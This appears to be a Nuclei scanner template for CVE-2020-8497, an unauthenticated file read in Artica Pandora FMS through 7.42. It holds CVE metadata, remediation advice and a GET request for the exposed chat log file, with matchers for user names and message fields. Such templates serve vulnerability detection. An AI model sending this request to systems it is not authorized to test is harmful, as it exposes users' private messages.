50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2020-8497
|
|
|
|
info:
|
|
name: Artica Pandora FMS <=7.42 - Arbitrary File Read
|
|
author: gy741
|
|
severity: medium
|
|
description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
|
|
remediation: |
|
|
Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://k4m1ll0.com/cve-2020-8497.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8497
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-8497
|
|
cwe-id: CWE-306
|
|
epss-score: 0.002
|
|
epss-percentile: 0.56881
|
|
cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: artica
|
|
product: pandora_fms
|
|
tags: cve,cve2020,fms,artica
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"type"'
|
|
- '"id_user"'
|
|
- '"user_name"'
|
|
- '"text"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100af1818c7f41234374edabf5cb8c41a1f1f2b0006f1ad792cc58aa2617de103160220625f87c03f8a6d85ac8db0b8598f26a7b1324d62edd1e9420071b0d8c83e2610:922c64590222798bb761d5b6d8e72950 |